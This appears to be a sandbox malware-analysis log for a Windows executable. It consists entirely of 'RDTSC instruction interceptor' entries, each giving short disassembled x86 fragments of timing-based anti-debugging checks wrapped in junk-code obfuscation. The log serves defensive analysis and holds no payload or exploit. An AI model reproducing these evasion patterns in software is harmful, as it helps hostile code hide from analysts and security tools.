Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5045E second address: 4D50464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50464 second address: 4D50468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50468 second address: 4D50479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [eax+18h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov di, cx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50491 second address: 4D5050A instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F0E05506CF4h 0x0000000c pushfd 0x0000000d jmp 00007F0E05506CF2h 0x00000012 xor ah, 00000038h 0x00000015 jmp 00007F0E05506CEBh 0x0000001a popfd 0x0000001b pop esi 0x0000001c popad 0x0000001d mov esi, eax 0x0000001f jmp 00007F0E05506CEFh 0x00000024 test esi, esi 0x00000026 jmp 00007F0E05506CF6h 0x0000002b je 00007F0E760E5E95h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edi, 07E1BEE0h 0x00000039 push ebx 0x0000003a pop ecx 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5050A second address: 4D50531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E05507500h 0x00000009 xor si, 6128h 0x0000000e jmp 00007F0E055074FBh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50531 second address: 4D5054F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub eax, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F0E05506CEEh 0x00000011 pop eax 0x00000012 mov al, dh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5054F second address: 4D5058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b jmp 00007F0E055074FEh 0x00000010 mov dword ptr [esi+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E05507507h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5058C second address: 4D505EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E05506CEFh 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+08h], eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pushfd 0x00000013 jmp 00007F0E05506CF7h 0x00000018 adc cx, 1B3Eh 0x0000001d jmp 00007F0E05506CF9h 0x00000022 popfd 0x00000023 pop ecx 0x00000024 mov di, 21B4h 0x00000028 popad 0x00000029 mov dword ptr [esi+0Ch], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D505EE second address: 4D505F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D505F2 second address: 4D505F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D505F6 second address: 4D505FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D505FC second address: 4D5060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5060A second address: 4D5060E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5060E second address: 4D50660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+4Ch] 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f push eax 0x00000010 mov edi, 5295F298h 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov dword ptr [esi+10h], eax 0x0000001a pushad 0x0000001b mov ch, E7h 0x0000001d pushad 0x0000001e mov edx, 1D71A274h 0x00000023 popad 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+50h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov bx, si 0x0000002e pushfd 0x0000002f jmp 00007F0E05506CF0h 0x00000034 adc ecx, 30CF3428h 0x0000003a jmp 00007F0E05506CEBh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50660 second address: 4D50678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05507504h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50678 second address: 4D506A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0E05506CF5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D506A3 second address: 4D5072D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E05507507h 0x00000009 sbb ecx, 3083F02Eh 0x0000000f jmp 00007F0E05507509h 0x00000014 popfd 0x00000015 mov ch, 7Ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+54h] 0x0000001d jmp 00007F0E05507503h 0x00000022 mov dword ptr [esi+18h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F0E055074FBh 0x0000002e xor ax, 7AEEh 0x00000033 jmp 00007F0E05507509h 0x00000038 popfd 0x00000039 mov ch, 36h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5072D second address: 4D50769 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E05506CEDh 0x00000015 xor al, FFFFFFD6h 0x00000018 jmp 00007F0E05506CF1h 0x0000001d popfd 0x0000001e mov ax, E947h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50769 second address: 4D507A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c jmp 00007F0E055074FEh 0x00000011 mov eax, dword ptr [ebx+5Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0E05507507h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507A7 second address: 4D507AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507AD second address: 4D507E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b pushad 0x0000000c mov cl, bl 0x0000000e mov bx, ax 0x00000011 popad 0x00000012 mov eax, dword ptr [ebx+60h] 0x00000015 jmp 00007F0E05507500h 0x0000001a mov dword ptr [esi+24h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F0E055074FAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507E3 second address: 4D507E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507E7 second address: 4D507ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507ED second address: 4D507FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CEDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D507FE second address: 4D50831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b jmp 00007F0E055074FDh 0x00000010 mov dword ptr [esi+28h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edx, 5DB7488Eh 0x0000001b jmp 00007F0E055074FFh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50831 second address: 4D508B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0E05506CEFh 0x00000008 pop esi 0x00000009 call 00007F0E05506CF9h 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [ebx+68h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0E05506CEDh 0x0000001c and ax, 5E26h 0x00000021 jmp 00007F0E05506CF1h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F0E05506CF0h 0x0000002d and si, D7C8h 0x00000032 jmp 00007F0E05506CEBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508B6 second address: 4D508BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508BA second address: 4D508C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508C0 second address: 4D508D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508D8 second address: 4D508DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508DC second address: 4D508E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508E2 second address: 4D508E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508E8 second address: 4D508EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D508EC second address: 4D50969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c jmp 00007F0E05506CEAh 0x00000011 mov ax, word ptr [ebx+00000088h] 0x00000018 jmp 00007F0E05506CF0h 0x0000001d mov word ptr [esi+32h], ax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F0E05506CEDh 0x0000002a xor ecx, 16C1A3A6h 0x00000030 jmp 00007F0E05506CF1h 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F0E05506CF0h 0x0000003c or si, 0148h 0x00000041 jmp 00007F0E05506CEBh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50969 second address: 4D509FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E055074FFh 0x00000009 adc ax, 738Eh 0x0000000e jmp 00007F0E05507509h 0x00000013 popfd 0x00000014 mov ch, 7Eh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+0000008Ch] 0x0000001f pushad 0x00000020 jmp 00007F0E05507509h 0x00000025 pushad 0x00000026 push ecx 0x00000027 pop ebx 0x00000028 mov ebx, esi 0x0000002a popad 0x0000002b popad 0x0000002c mov dword ptr [esi+34h], eax 0x0000002f jmp 00007F0E05507504h 0x00000034 mov eax, dword ptr [ebx+18h] 0x00000037 jmp 00007F0E05507500h 0x0000003c mov dword ptr [esi+38h], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D509FA second address: 4D509FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D509FE second address: 4D50A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507509h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50A1B second address: 4D50AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E05506CF7h 0x00000009 xor ah, 0000006Eh 0x0000000c jmp 00007F0E05506CF9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F0E05506CF0h 0x00000018 or cx, C1E8h 0x0000001d jmp 00007F0E05506CEBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov eax, dword ptr [ebx+1Ch] 0x00000029 jmp 00007F0E05506CF6h 0x0000002e mov dword ptr [esi+3Ch], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F0E05506CEAh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50AA2 second address: 4D50AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50AA6 second address: 4D50AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50AAC second address: 4D50AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 jmp 00007F0E05507508h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+20h] 0x00000010 pushad 0x00000011 mov al, DFh 0x00000013 movsx edi, si 0x00000016 popad 0x00000017 mov dword ptr [esi+40h], eax 0x0000001a pushad 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f pushad 0x00000020 mov di, ax 0x00000023 mov cx, F89Bh 0x00000027 popad 0x00000028 popad 0x00000029 lea eax, dword ptr [ebx+00000080h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0E055074FDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50AFD second address: 4D50B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50B03 second address: 4D50B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50B07 second address: 4D50B47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d jmp 00007F0E05506CF6h 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0E05506CEAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50B47 second address: 4D50B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50B4D second address: 4D50C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E05506CECh 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F0E05506CECh 0x00000014 nop 0x00000015 pushad 0x00000016 mov dx, cx 0x00000019 mov ecx, 54A83659h 0x0000001e popad 0x0000001f lea eax, dword ptr [ebp-10h] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F0E05506CF2h 0x00000029 and eax, 638094E8h 0x0000002f jmp 00007F0E05506CEBh 0x00000034 popfd 0x00000035 call 00007F0E05506CF8h 0x0000003a pushfd 0x0000003b jmp 00007F0E05506CF2h 0x00000040 jmp 00007F0E05506CF5h 0x00000045 popfd 0x00000046 pop ecx 0x00000047 popad 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c call 00007F0E05506CF9h 0x00000051 pop ecx 0x00000052 mov edx, 5685B0B4h 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50C0A second address: 4D50C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 32h 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F0E05507508h 0x00000016 or eax, 11F8D198h 0x0000001c jmp 00007F0E055074FBh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50C47 second address: 4D50C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50C4C second address: 4D50C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05507502h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50CAA second address: 4D50CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50CC2 second address: 4D50D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e mov esi, 54A4DEFBh 0x00000013 pushad 0x00000014 call 00007F0E055074FEh 0x00000019 pop esi 0x0000001a mov ax, bx 0x0000001d popad 0x0000001e popad 0x0000001f js 00007F0E760E5EC9h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0E05507508h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D10 second address: 4D50D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D16 second address: 4D50D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D1A second address: 4D50D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D1E second address: 4D50D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D2F second address: 4D50D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D33 second address: 4D50D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D39 second address: 4D50D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D3F second address: 4D50D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e jmp 00007F0E05507506h 0x00000013 lea eax, dword ptr [ebx+78h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx ebx, si 0x0000001c mov al, C6h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D79 second address: 4D50D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50D7E second address: 4D50E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007F0E05507506h 0x00000010 nop 0x00000011 pushad 0x00000012 call 00007F0E055074FEh 0x00000017 pushfd 0x00000018 jmp 00007F0E05507502h 0x0000001d and si, 6958h 0x00000022 jmp 00007F0E055074FBh 0x00000027 popfd 0x00000028 pop ecx 0x00000029 mov cl, dl 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F0E05507501h 0x00000034 add ch, FFFFFFF6h 0x00000037 jmp 00007F0E05507501h 0x0000003c popfd 0x0000003d mov edi, esi 0x0000003f popad 0x00000040 nop 0x00000041 pushad 0x00000042 jmp 00007F0E05507508h 0x00000047 movzx eax, di 0x0000004a popad 0x0000004b lea eax, dword ptr [ebp-08h] 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 movsx edi, cx 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50E2B second address: 4D50E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50EDF second address: 4D50EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50EE4 second address: 4D50EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50EEA second address: 4D50EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50EEE second address: 4D50F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E05506CF0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50F0A second address: 4D50F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50F10 second address: 4D50F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50F14 second address: 4D50FDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0E055074FCh 0x00000014 xor eax, 23200DE8h 0x0000001a jmp 00007F0E055074FBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F0E05507508h 0x00000026 add si, A048h 0x0000002b jmp 00007F0E055074FBh 0x00000030 popfd 0x00000031 popad 0x00000032 js 00007F0E760E5C3Bh 0x00000038 jmp 00007F0E05507506h 0x0000003d mov eax, dword ptr [ebp-04h] 0x00000040 jmp 00007F0E05507500h 0x00000045 mov dword ptr [esi+08h], eax 0x00000048 pushad 0x00000049 mov bh, cl 0x0000004b mov ah, dh 0x0000004d popad 0x0000004e lea eax, dword ptr [ebx+70h] 0x00000051 jmp 00007F0E05507502h 0x00000056 push 00000001h 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F0E05507507h 0x0000005f rdtsc
